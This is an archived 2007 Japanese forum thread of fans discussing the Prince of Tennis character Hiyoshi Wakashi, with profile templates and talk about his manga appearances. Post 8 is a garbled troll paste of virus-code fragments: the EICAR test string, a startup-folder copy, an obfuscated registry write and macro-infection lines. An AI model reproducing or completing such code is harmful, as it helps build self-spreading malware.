5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【RISE&FALL】テニプリの日吉若に萌えるスレ 7ヒヨ【下剋上等】

1 :ヒヨスキー7号:2007/11/26(月) 21:06:52 ID:ScXdfc/o
ここは演武テニスでコート上を暴れまわる、下剋上大好き古武術ボーイ・日吉若(ひよし わかし)に萌えるスレです。
演武テニス・古武術・学園七不思議系・ツンデレなどのキーワードにキィィィンと来た方、共に思う存分ハァハァしましょう。

〜このスレの大まかなルール〜
・sage進行。荒らしはスルー。
・他キャラ、作者叩きは禁止。
・ニコニコ及びようつべの話題は禁止。
・早売りのネタバレは「ヒヨがカッコよかったよ」と具体的でない場合はおk
・次スレは>>980を取った人が建てる。
・とにもかくにも ヒヨ(*´д`)ハァハァ

前スレ↓
【RISE&FALL】テニプリの日吉若に萌えるスレ 6ヒヨ【下剋上等】
http://anime2.2ch.net/test/read.cgi/cchara/1186398635/
【RISE】テニプリの日吉若に萌えるスレ 5ヒヨ【下剋上等】
http://anime2.2ch.net/test/read.cgi/cchara/1180929295/
【不条理だと喚いても】テニプリ日吉若スレ・ヒヨ4【やめないぜ下剋上】
http://anime2.2ch.net/test/read.cgi/cchara/1173702384/
【下剋上等】テニプリの日吉若に萌えるスレ・3ヒヨ【きのこ君】
http://anime2.2ch.net/test/read.cgi/cchara/1164104589/
【下剋上等】テニプリの日吉若に萌えるスレ・2ヒヨ【きのこ君】
http://comic6.2ch.net/test/read.cgi/cchara/1152716397/
【下剋上等】テニプリの日吉若に萌えるスレ【きのこ君】
http://comic6.2ch.net/test/read.cgi/cchara/1140452088/

2 :名無しかわいいよ名無し:2007/11/26(月) 21:07:53 ID:ScXdfc/o
ヒヨ'sプロフィール

・名前: 日吉 若(ひよし わかし)
・学籍: 氷帝学園中2年生
・生年月日: 12月5日(射手座/誕生花・カトレア)
・身長: 172cm
・体重: 60s
・血液型: AB型
・利き腕: 右
・プレイスタイル: アグレッシブ・ベースライナー
・愛用メーカー:
 シューズ/Prince(color:BLACK)
 ラケット/BRIDGESTONE(DURA POWERII(BTSD85))
・得意技: 古武術ストローク(演武テニス)
・好きな食べ物: 濡れ煎餅
・趣味: 読書(学園七不思議系)
・家族構成: 祖父、祖母、父、母、兄
・父親の職業: 古武術師範
・得意科目: 数学、歴史
・好きな色: 特になし
・好みのタイプ: 清楚な人

3 :名無しかわいいよ名無し:2007/11/26(月) 21:08:47 ID:ScXdfc/o
【 ヒヨが登場するテニプリゲーム 】
・「テニスの王子様・Kiss of Prince〜Flame〜」(PS2/ミュージッククリップゲーム/通称:キスプリ)
  (ヒヨの歌が聞ける)
・「みんなの王子様」(GBA/バラエティゲーム)
  (ヒヨの出てくるゲーム:「テニス球」の氷帝、ふぃふてぃ〜んパネルズ、氷帝100人斬り、榊の診断、体験版)
・「テニスの王子様2004 STYLISH SILVER」(GBA/アクションテニスゲーム)
  (ヒヨ操作可能。シングルス・ダブルスでとにかく試合に勝ち進むゲーム(?))
・「テニスの王子様2005 CRYSTAL DRIVE」(DS/アクションテニスゲーム)
  (ヒヨ画像(全5種)集めるとボイス(14種)がギャラリーで聴けるようになる。
   そのうえ試合のミニキャラとは違う、観戦用のミニキャラがいる。何より、コートに日吉道場がある)
・「テニスの王子様・Smash&Hit2」(PS2・通称:SH2、スマヒ2)
  (ヒヨ操作可能、ヒヨスチルコンプでお礼ボイスが聞ける。立ち絵がなかなかきれいだと評判)
・「テニスの王子様・Rush&Dream」(PS2/通称:RD)
  (ヒヨは非攻略キャラで登場、しかし和服姿などが拝めるので見たい人はどうぞ)
・「テニスの王子様・最強チームを結成せよ!」(PS2/アクション+育成テニスゲーム/通称:最強)
  (ヒヨ操作可能。立ち絵・スチル共に優良。キャラ性能バランス良し。個別イベント有り。趣味のDVDを語ったり練習帰りに一緒に濡れ煎餅を食べたりできる)
・「テニスの王子様・学園祭の王子様」(PS2/乙女ゲー/通称:学プリ)
  (立ち絵の髪型はまさにきのこだが、これでヒヨにハマった人が続出。その見事なまでのツンデレぶりはもはや芸術。お手頃価格の廉価版発売中)
・「テニスの王子様・山麓のMystic」(PS2/乙女ゲー/通称:山)
  (ヒヨ攻略可能。学プリに比べて、立ち絵およびスチルなどのグラフィック面についてはかなり改善されているが、萌え度は学プリの方が上かもしれない)
・「テニスの王子様・海辺のSecret」(PS2/乙女ゲー/通称:海)
  (ヒヨ攻略不可。冒頭イベントや一部の会話で登場)
・「テニスの王子様・CARD HUNTER」(PS2/対戦型カードゲーム/通称:札狩)
  (キャラクターカードにヒヨを入れる、もしくはヒヨと対戦すると、右下/左上にミニヒヨ登場。無論動く。
   試合開始&終了時や試合中はことあるごとにヒヨが喋る。しばらく操作せずに放っておくと、キャラカットインつきでヒヨが急かしてくる(ボイス有り)。
   ちなみにヒヨはBブロックで登場。撃破すると、オマケのサウンドビューでヒヨ台詞の全部が聞ける。その数およそ200種以上)

4 :名無しかわいいよ名無し:2007/11/26(月) 21:10:00 ID:ScXdfc/o
【 ヒヨが登場するOVA 】
・「テニスの王子様ORIGINAL VIDEO ANIMATION[全国大会篇]Vol.5&6」
  Vol.5では頬杖ヒヨ、足組みヒヨなどが拝める。
  Vol.6では向日とダブルスを組んで青学と対戦。下剋上等初披露。ヒヨのアップの作画はもはや神レベルと言っていい。
  なおEDでは、氷帝メンバーオンリー画像(全員私服)と共に、
  ヒヨが参加しているユニット「氷帝エタニティ」のデビュー曲「不条理」が聞ける。ヒヨソロパート有り。

【 ヒヨが参加しているテニプリキャラソン 】
・「RISE-下剋+上等-」
 初公開から2年7ヶ月、全国のヒヨファンの念願叶ってとうとうCD化が決定!!
 発売日は2007年7月11日。
・「チャームポイントは泣きボクロ」
 氷帝レギュラーメンバー全員参加。肝心のヒヨパートは、コーラス部分を除けば台詞での一箇所のみorz
 しかし一部では、跡部の台詞の後に「遠慮します」というヒヨの声が聞こえるという噂が・・・。
・「不条理」
 氷帝エタニティメンバーによるユニット曲。ロック調のかなりカッコいい曲。
 OVA6巻以降でED曲として使用された。1番と2番にそれぞれ1箇所ずつヒヨソロパートあり。

【 ヒヨが登場するコミックス 】
・18巻:ヒヨ初登場(vs青学越前)。
・32巻:向日と組んでのダブルス試合(vs青学乾&海堂)。
・20.5巻:ヒヨ的見所はプロフィール・日吉の太極拳講座・座談会など。
・30.5巻:イラスト集。越前対戦相手絵と描き下ろし絵のうち1枚にヒヨがいる。

【 ヒヨが登場するテニプリアニメ 】
・genius68、109、110、111、112、113、114、115、128、142、177

5 :名無しかわいいよ名無し:2007/11/26(月) 21:15:12 ID:SdxHq6HI
>>1乙カレー煎餅

6 :名無しかわいいよ名無し:2007/11/26(月) 21:19:58 ID:adzV2yUC
>>1
乙!

7 :名無しかわいいよ名無し:2007/11/26(月) 22:07:09 ID:6tAs6S1B
>>1
下剋乙等

8 :名無しかわいいよ名無し:2007/11/27(火) 01:13:43 ID:caMxJLkD
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


9 :名無しかわいいよ名無し:2007/11/27(火) 10:36:56 ID:Eo8bAoiK
>>1
乙!


10 :名無しかわいいよ名無し:2007/11/27(火) 17:51:19 ID:ralbY9bO
さて新スレでもヒヨの小遣いの使い道について考えようか
濡れせん3割雑誌・本3割レンタル1割雑貨2割だと思うがどうだろう

11 :名無しかわいいよ名無し:2007/11/27(火) 18:00:00 ID:m2H8Ta0l
本2割レンタル1割雑貨類など2割
そして半分貯金
半分は貯金に回す!とか自らに課していると良い
濡れせんはお家に常備だから自分では気が向いた時に買う位だと予想

12 :名無しかわいいよ名無し:2007/11/27(火) 19:51:37 ID:m2H8Ta0l
【 ヒヨが登場するコミックス 細かいところまでチェックver. 】
・21巻:扉絵が氷帝メンバー(ただし同じ絵のカラー版が20.5巻に掲載されている)。氷帝を描いたページが3ページある中に、練習に打ち込むヒヨの姿がある(台詞なしモノローグあり)。
・24巻,25巻:氷帝レギュラーと共に青学対立海戦の観戦。ただし頑張らないと判別できない程の大きさでしか描かれていない(台詞なし)。
・26巻:越前対真田戦にて自身が越前と戦った経験を元にした発言あり(その1コマでページの半分占領)。
・28巻:Genius242(「氷帝狂詩曲」)が一話丸々氷帝全国出場決定の話。
・29巻:全国大会開会式の入場行進で氷帝の最後尾を歩いている(台詞なし)。
・31巻:氷帝レギュラーと共に手塚対木手戦の観戦。「下克上だ」と一言。
・33巻:青学対氷帝戦。ヒヨの試合は終わっているものの、数コマ姿が描かれる(台詞なし)。
・34巻:冒頭台詞あり。跡部対越前戦では下剋上等が無我の境地でコピーされ、驚きを隠しきれないヒヨの姿が拝める。
・35巻:2コマのみヒヨ登場。しかしどちらも顔の片側しか描かれていない(台詞なし)。
・38巻:人気投票上位10名が描かれているGenius333の扉絵に登場。
39巻:焼き肉編。忍足による紹介の後は後ろ姿しか描かれず、いつの間にかリタイア(台詞なし)。

前スレで焼き肉編の29巻はテンプレに加えないのかという話がちょこっとでていたので勢いで作ってみた
人気投票やバレンタインチョコランキングは除いたけど漏れ落ちあったらスマソ

13 :12:2007/11/27(火) 19:54:05 ID:m2H8Ta0l
×焼き肉編の29巻
○焼き肉編の39巻

14 :名無しかわいいよ名無し:2007/11/27(火) 19:55:56 ID:1dAMhsYA
>>12
すごいな乙!これはありがたい
普通に見過ごしてるシーンが幾つかあるww

15 :名無しかわいいよ名無し:2007/11/27(火) 20:15:31 ID:qqfsN7MA
>>12
乙すぎる

16 :名無しかわいいよ名無し:2007/11/27(火) 21:24:56 ID:tMcchAnK
>>12
乙だが35巻にはまだオヌヌメポイントがある
P40、倒れた跡部に岳人と同コマで「部長ーっ!!」と叫ぶシーンもぜひ追加希望
顔ははっきり描かれてないものの、普段クールなヒヨが熱さを露わにした貴重なシーンで
個人的には大好きだ

17 :名無しかわいいよ名無し:2007/11/27(火) 21:43:54 ID:m2H8Ta0l
>>16
ああ…それを書きそびれるなんて……orz
ヒヨに古武術で吹っ飛ばされてくる

18 :名無しかわいいよ名無し:2007/11/27(火) 22:11:18 ID:9i857dx+
>>12
家に31巻だけないんだが買うことにする。

19 :名無しかわいいよ名無し:2007/11/27(火) 22:27:48 ID:SeG4SOy7
>>12
乙!超乙!
前スレでぼやいてみた結果、こんなにも見逃しているところがあったとは…!
ヒヨに古武術で吹っ飛ばされた後、罵られてくることにする

20 :名無しかわいいよ名無し:2007/11/28(水) 00:14:43 ID:BmhOMYij
ヒヨってお小遣いもらってもあんま使わなさそう

21 :名無しかわいいよ名無し:2007/11/28(水) 01:03:49 ID:dIbJkGOH
乙乙!
>>17>>19そんな羨ましいこと許さん!一緒に連れてってください

22 :名無しかわいいよ名無し:2007/11/28(水) 01:27:47 ID:S3H3RNnJ
吹っ飛ばされるのはもはや自分にとってご褒美だwww
南半球まで飛ばしてほしい

23 :名無しかわいいよ名無し:2007/11/28(水) 01:35:37 ID:RbzMcDnL
そういやひよの古武術って体術なのか武具を持ったものなのか
どっちなんだろ

24 :名無しかわいいよ名無し:2007/11/28(水) 02:28:58 ID:VxZZAMU3
体術のイマゲ

25 :名無しかわいいよ名無し:2007/11/28(水) 08:05:57 ID:MLMi2HBT
型だけなら沖縄の武器を扱う武術らしい
20.5巻とるろ剣の宇水戦を見ればよくわかる

前に出した手は丸みを帯びた盾を使って相手の攻撃を受流し
その隙を突いて引いた手から手槍(短矛)で斬ったり突いたりするとか

まぁそんな古武術が何故都内で道場やってるのかは謎だ

26 :名無しかわいいよ名無し:2007/11/28(水) 13:54:13 ID:q2VtLejM
そりゃあ無差別格闘技「テニヌ」に参加し実力を示すためだろうよ

27 :名無しかわいいよ名無し:2007/11/28(水) 20:58:21 ID:QXO4btbY
ラケットは人を傷つけるためにあるんじゃない!

28 :名無しかわいいよ名無し:2007/11/28(水) 22:16:45 ID:SJvkg2cX
大丈夫、ヒヨならラケットなんざなくても素手で相手を木っ端微塵に出来る

29 :名無しかわいいよ名無し:2007/11/29(木) 00:27:26 ID:DhoNUsVy
一応少年漫画なんだし、乙女ゲーまでやるなら格ゲーでも何か出してくれないかなぁ。

30 :名無しかわいいよ名無し:2007/11/29(木) 01:12:36 ID:uLs+JWa7
Σ(((φ(゚∀゚*)<上上下下左右左右BA!
 ズビシズビシ


      【 -下剋+上等- 】

 ∧_∧      『ここにお前にとっての下剋上はないんだよ!』
 ( `Д´)=つ≡つ
 (っ ≡つ=つ
 /   ) ババババ
 ( / ̄∪

31 :名無しかわいいよ名無し:2007/11/29(木) 01:49:15 ID:e++bucj+
>>30
懐かしいwコナミだけにかww

殴り合いみたいな完璧な格ゲーは難しいかもしれないけど
今でもゲームでありえない技使ってるんだし
どう見ても格ゲなのに「あくまでもテニスですが何か?」と言い張る感じで作って欲しいなあw

32 :名無しかわいいよ名無し:2007/11/29(木) 02:19:48 ID:IIWaAW3s
たしけが許すかどうかが問題

33 :名無しかわいいよ名無し:2007/11/29(木) 02:21:20 ID:3EmE0vbQ
たしけならゴーサイン出しそうw

34 :名無しかわいいよ名無し:2007/11/29(木) 02:37:48 ID:e++bucj+
たしけなら参戦するよ

35 :名無しかわいいよ名無し:2007/11/29(木) 03:13:50 ID:oDBzw0f3
なんだこの流れwww
場所選択では豪華客船と宇宙も選べるようにしてほしいなw

36 :名無しかわいいよ名無し:2007/11/29(木) 06:52:50 ID:qO5qcqFk
ひよは出てないがサポートとして既に格ゲーに参戦済のテニプリ
ジャンプスーパースターズとジャンプアルティメットスターズの二作な

37 :名無しかわいいよ名無し:2007/11/29(木) 15:41:13 ID:v7JCnY6R
>>34
ちょw参戦ww
フルボイスで今度はラスボスですか?w

38 :名無しかわいいよ名無し:2007/11/29(木) 23:20:18 ID:ArRY2WX7
もうじき12月だね。
ヒヨの誕生日が迫っていると思うとなんだか居ても立ってもいられないよ。


39 :名無しかわいいよ名無し:2007/11/29(木) 23:37:18 ID:k1GeeTA3
12月4日が40.5巻発売日
12月5日がヒヨ誕生日

・・・預言しよう、この2日はここが祭りになると

40 :名無しかわいいよ名無し:2007/11/29(木) 23:42:29 ID:3EmE0vbQ
当たり前すぎて予言になってない気もしなくもないw

41 :名無しかわいいよ名無し:2007/11/30(金) 01:21:25 ID:Q/o1VOuz
ケータイジャンプに氷帝のケータイアレンジが追加されてたよ

42 :名無しかわいいよ名無し:2007/11/30(金) 01:51:25 ID:RwbFB3ZE
2年ズの中では一番早く生まれたんだね


43 :名無しかわいいよ名無し:2007/11/30(金) 01:56:43 ID:G9LP8FiP
>>41
まままじで!?ずっと待ってたんだ、さっそく取りにいってくる

44 :名無しかわいいよ名無し:2007/11/30(金) 06:42:40 ID:5T0UAUCd
>>41
おおお情報d!自分も早速取ってきた(*゚∀゚)=3
ヒヨはこないだのランダム待受と同じショットだけど、この絵好きだからいいや。
しかも監督や滝さんまでいるとはw

45 :名無しかわいいよ名無し:2007/11/30(金) 06:58:36 ID:n+ffgdAg
2年ズはひと月づつ誕生日がくるから面白いな

46 :名無しかわいいよ名無し:2007/11/30(金) 22:25:02 ID:X3o54ymH
誰もいないみたいなのでヒヨは貰っていきますね

47 :名無しかわいいよ名無し:2007/11/30(金) 22:27:49 ID:M33xfp6k
>>46
阻止

48 :名無しかわいいよ名無し:2007/12/01(土) 00:26:32 ID:esfYPibV
2年ズは誕生月が続いてるから、先輩達に3人まとめて中間の樺地の誕生日にお祝いされてたりしないかな
映画みたいに跡部がはりきりそうだ

49 :名無しかわいいよ名無し:2007/12/01(土) 09:17:07 ID:KOkHvEMd
>>46>>47いまさらながら阻止速すぎるだろwwww
そして跡部ならまとめなんてケチくさいこと言わずに正月休みでも
部員集めて樺地の誕生日祝う もちろん12月と2月もやる普通に

50 :名無しかわいいよ名無し:2007/12/01(土) 16:55:19 ID:ZR7A4Wst
来週発売のジャンプ1号は買いだぜ!



51 :名無しかわいいよ名無し:2007/12/01(土) 18:46:44 ID:kZCTKPb1
>>50
k・w・s・k!
と言いたい所だけど我慢する。
なんだろう…

52 :名無しかわいいよ名無し:2007/12/01(土) 18:58:48 ID:LmhyvPjV
バレが本当なら買ってくる

53 :名無しかわいいよ名無し:2007/12/01(土) 20:03:17 ID:ZR7A4Wst
バレというのが何かは知らんが、手元にジャンプ1号はあるぞ
姐さん達、買うんだ!

買えばわかる


54 :名無しかわいいよ名無し:2007/12/01(土) 20:04:40 ID:NRrXs6PQ
あれが本当なら、ヒヨがWJに出てくる可能性がかなり高いってわけか
それも焼肉の時みたいに顔出しだけじゃなくてラケットと技と台詞つきでな

55 :名無しかわいいよ名無し:2007/12/01(土) 20:09:27 ID:NRrXs6PQ
>>53
バレと言うのは>>1のとおり、
「ヒヨが(ピー)して(ピピー)で(ピピピー)だ!特に(ピーピピー)したヒヨは最高だったぜ!」
と、具体例を挙げて書き込むことだ
なので、「ヒヨ最高(*´∀`)ステキ」だけなら大丈夫と言うことだ

しかし早売りがある地域はいいなあ
自分たこ焼きの国住民だが、WJが本屋orコンビニに並ぶのは最速で月曜だ。・゚・(ノ∀`)・゚・。

56 :名無しかわいいよ名無し:2007/12/01(土) 21:19:50 ID:thn/QP0E
>>55
緑山県民だが同じく月曜まで待ちだ。・゚・(ノ∀`)・゚・。
当日までヒヨへの想いをじっくりねっとりもっちり練り上げて待つんだぜ!

57 :名無しかわいいよ名無し:2007/12/01(土) 23:16:56 ID:WDNjLkVQ
おおおおおう!まじだあああ!!見たよ!!
テンション上がったあああああああああヽ(*´∀`*)ノ!!!

58 :名無しかわいいよ名無し:2007/12/02(日) 06:35:15 ID:XayxkNrM
ジャンプ、40.5巻、ヒヨ誕生日と3日間祭りは決定だな

59 :名無しかわいいよ名無し:2007/12/02(日) 08:34:56 ID:03dcP7bV
マジでかあああ
12月はいいことがたくさんあるなあ

60 :名無しかわいいよ名無し:2007/12/02(日) 11:47:37 ID:0WAwFl4d
きっとヒヨのお誕生日お祝い号なんだね!
早く明日になーれ!

61 :名無しかわいいよ名無し:2007/12/02(日) 15:38:56 ID:+Thx046L

   *``・*。.    。.:☆   .     *。+゚ ★
   |   `*。 ;*  †▲_*;.。.: ∧  ∧  /*。
  ,。∩    *. ゚*: (('∀`);゚' +< ,,‘∀‘> つ  *。+゚
 + (・ω・´)*。   ゚・* (  7  `*。 二つ *゚*
 `*。 ヽ つ*゜* .  < ヽ   \+。*・'
  `・+。*・`゜⊃ +゜   *。+゚    ∪`J
  ☆  ∪~。**'``・* 。
  `・+。*・゜.  |     `*。
      ,。 _,,∩,_     * 早く明日にな〜れ〜☆
     + / ,' 3 `ヽ* 。+゚
     `*⊂    ,j *゚ *
       ゚と・+。*・' ゚ +゚
       ☆ `(ノ′ 。*

62 :名無しかわいいよ名無し:2007/12/03(月) 09:07:17 ID:YGgDr251
久しぶりのセリフ有り?な日吉登場が嬉しい!

63 :名無しかわいいよ名無し:2007/12/03(月) 15:35:57 ID:Kv0TH5Je
買ってまいりましたWJ!
ちゃんとヒヨ載ってましたよ、ラストページ左側にかなり大きめサイズで!
しかもその2ページ前の「ウソだったら承知しないぞ青学一年ッ!!」っつー台詞つき(こっちは目から下だけだけど)

自分最近はアニメのヒヨを見慣れてたもんで、WJでのキリッとしたヒヨにちょっとびっくりなんだが、
でも久方ぶりの本誌登場でほんと嬉しいw

ついでに本屋で40.5巻ないかなあと探してみたけどやっぱありませんでしたorz

64 :名無しかわいいよ名無し:2007/12/03(月) 15:37:36 ID:wl3OS3os
主人公と試合したキャラなんだよなーと感慨深いものがあるね
リョーマのこと「チビスケ」って呼ぶのは原作だと日吉だけだし

65 :名無しかわいいよ名無し:2007/12/03(月) 15:59:39 ID:NXbAosEq
以前と比べて作画崩壊気味だったけど
でかでか登場と次回以降も出ると思うとワクテカが止まらない

実はリョーマが記憶喪失になってからずっと期待してた展開でもある・・
夢が叶って嬉しすぎるよもう

66 :名無しかわいいよ名無し:2007/12/03(月) 17:09:16 ID:KInfWq4e
すこし作画崩壊してたが目が大きくなってたな
ハッ!まさかこれもただの作画の乱れ…?!

67 :名無しかわいいよ名無し:2007/12/03(月) 18:43:32 ID:jRmoowVG
ヒヨ出番おめ!
全然出てくると思ってなかったから、不意打ちでめっちゃ嬉しい

68 :名無しかわいいよ名無し:2007/12/03(月) 18:54:45 ID:2zePf2gF
「ウソだったら承知しないぞ」
ってなんか可愛いwww

69 :名無しかわいいよ名無し:2007/12/03(月) 22:26:42 ID:SYqTnmUC
ダッシュで買ってきた!!ニヤニヤがとまらないYO!

明日も.5でヒヨが拝めるのか…。幸せすぎる

70 :名無しかわいいよ名無し:2007/12/03(月) 22:37:40 ID:+fTW3SHe
>ウソだったら承知しないぞ
セリフだけ見るとどこかの萌えっ子が言ってもおかしくないなw

ほんとに3日連続でってなんかすごい。幸せすぎて怖いの域だ

71 :名無しかわいいよ名無し:2007/12/03(月) 23:34:48 ID:QrvG02Bm
ジャンプ買ってきたぁ!いいわぁ〜アップで載ってるってwww
自分今日誕生日だから思わぬプレゼント貰った気分で嬉しいいいww

72 :名無しかわいいよ名無し:2007/12/04(火) 00:32:26 ID:NNbuAlZo
日が変わったけど>71おめ!

思わずコンビニで叫びそうになったよ…

73 :名無しかわいいよ名無し:2007/12/04(火) 00:55:22 ID:zQ2/9hwk
盛り上がってるなー!
今日明日と連続で新ヒヨが拝めるとか、幸せすぎて死ねそう…
この調子だと、来週もヒヨ出るってことかな!
楽しみで仕方がない

74 :名無しかわいいよ名無し:2007/12/04(火) 12:34:26 ID:LncGpl0X
買ってきた
新たなプロフィールが嬉しすぎて死にそうだよどうしよう!!
とりあえずひよの眼鏡姿を見たいです

75 :名無しかわいいよ名無し:2007/12/04(火) 12:50:11 ID:xaMVdlAn
自分は葉書出してないが、日吉コーナーにて「ひよは今のままで」が採用されてて嬉しい
葉書出した姐さんたちGJ!

76 :名無しかわいいよ名無し:2007/12/04(火) 13:17:37 ID:Pko7SPwM
やっぱりあの前髪は視力悪くなるよなぁw
家用眼鏡はダサめの銀縁眼鏡が良いですハアハア

77 :名無しかわいいよ名無し:2007/12/04(火) 13:22:25 ID:c+qi6F55
40.5のネタバレOKなの?

78 :名無しかわいいよ名無し:2007/12/04(火) 13:23:29 ID:G65AC72Q
ああぁあぁ今日買えない自分に何という焦らしプレイ。・゚・(ノД`)・゚・。
脳内補完LVMAXで眼鏡ヒヨを堪能してくる

>>77
発売済みなんだからいんじゃね?

79 :名無しかわいいよ名無し:2007/12/04(火) 13:37:39 ID:zQ2/9hwk
眼鏡!?
え、ちょ、kwsk聞きたいけど、良いのかな…?
今日買えなくてほんと悔しい…orz

80 :名無しかわいいよ名無し:2007/12/04(火) 14:20:45 ID:TvroSGdi
眼鏡ひよ…お持ち帰りします。

81 :名無しかわいいよ名無し:2007/12/04(火) 14:24:42 ID:c+qi6F55
よく訪れる学校スポットは七不思議関連だな

82 :名無しかわいいよ名無し:2007/12/04(火) 15:25:27 ID:o+Q8IoDz
コンタクトなんてハイカラな物使ってるの以外は、意外性は…報道委員くらいかな
まあ持ち物検査でそっち系って事でちょっと納得はした。
カメラがアナログ(笑)

83 :名無しかわいいよ名無し:2007/12/04(火) 15:27:44 ID:63EK5sv7
【 ヒヨ'sプロフィール・最新版 】


・出身校: 氷帝学園2年F組19番
・誕生日: 12月5日(射手座)
・血液型: AB型
・得意技: 演武テニス

・委員会: 報道委員
・苦手科目: 音楽
・よく訪れる学校スポット: 本館の屋上へ通じる階段・音楽室・生物実験室
・出身小学校: 氷帝学園幼稚舎
・おこづかい使用例: 古書を買うこと
・座右の銘: 下剋上
・好きな映画: 香港映画(カンフーアクション系)
・好きな本: 学園七不思議系
・好きな音楽: 静かな曲
・行きたいデートスポット: ミステリースポット
・今一番欲しいもの: S1(シングルスワン)の座
・日課: 早朝稽古
・苦手なもの(事): カラオケ
・テニス以外の特技: そろばん


【 ヒヨ'sパーソナルデータ 】

・身長: 172センチ
・体重: 60キロ
・足のサイズ: 26.5センチ
・視力: 左右0.5

84 :名無しかわいいよ名無し:2007/12/04(火) 15:32:18 ID:63EK5sv7
↑は次スレのテンプレにでも使ってくれw
つーかヒヨって視力低かったんだなー・・・。でも自分よりまだいいわ、羨ましい

ってか持ち物見てびっくりした。ヒヨってコンタクトだったのか!
しかも家では眼鏡!

・・・くそ、これ以上萌えさせてどーすんだよヒヨ!!www

85 :名無しかわいいよ名無し:2007/12/04(火) 15:37:12 ID:63EK5sv7
3連続ごめん
視力の下にもう一個あったのに書くの忘れた・・・!orz


・下剋上に目覚めた年齢: 3歳

86 :名無しかわいいよ名無し:2007/12/04(火) 16:26:52 ID:UE1qBr1N
乙!

視力の下に
(コンタクト使用・家では眼鏡)
も入れて欲しいんだぜ

87 :名無しかわいいよ名無し:2007/12/04(火) 16:29:09 ID:YTDd3yqq
家では眼鏡っ子だったなんて…!!


日吉、貴方はなんて萌えを提供するんですか
萌え殺された…!!


88 :名無しかわいいよ名無し:2007/12/04(火) 16:32:49 ID:63EK5sv7
【 ヒヨ'sパーソナルデータ 】

・身長: 172センチ
・体重: 60キロ
・足のサイズ: 26.5センチ
・視力: 左右0.5
      (コンタクト使用、家では眼鏡使用)
・下剋上に目覚めた年齢: 3歳



>>86
こんなもんでいいかい?w

89 :名無しかわいいよ名無し:2007/12/04(火) 16:34:48 ID:PEW5hgTL
い・・・家ではメガネ・・・
何それもうだめ・・・・・・ころされる・・・
メガネかけてジャマな前髪をちょんまげ結ってハンテン着たヒヨと
こたつでテスト勉強とかしたい・・・・熱い玄米茶持ってきて
そのメガネを曇らせてやりたい・・・・・・・しぬ・・・・・・・・・・

90 :名無しかわいいよ名無し:2007/12/04(火) 16:51:56 ID:+3ydtIXj
何だおまいら眼鏡萌え属性ばっかだなww
そんな自分は特に眼鏡萌ってわけでもないのにピヨが眼鏡と聞いて(*´Д`*)ハァハァしちまっんだぜ


91 :名無しかわいいよ名無し:2007/12/04(火) 17:17:17 ID:NSGHmWzs
祭り2日目は死者続出だなwww
私も萌え死者の一人なんだがね
しかしどのキャラのスレより盛り上がっててワロタ

27 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)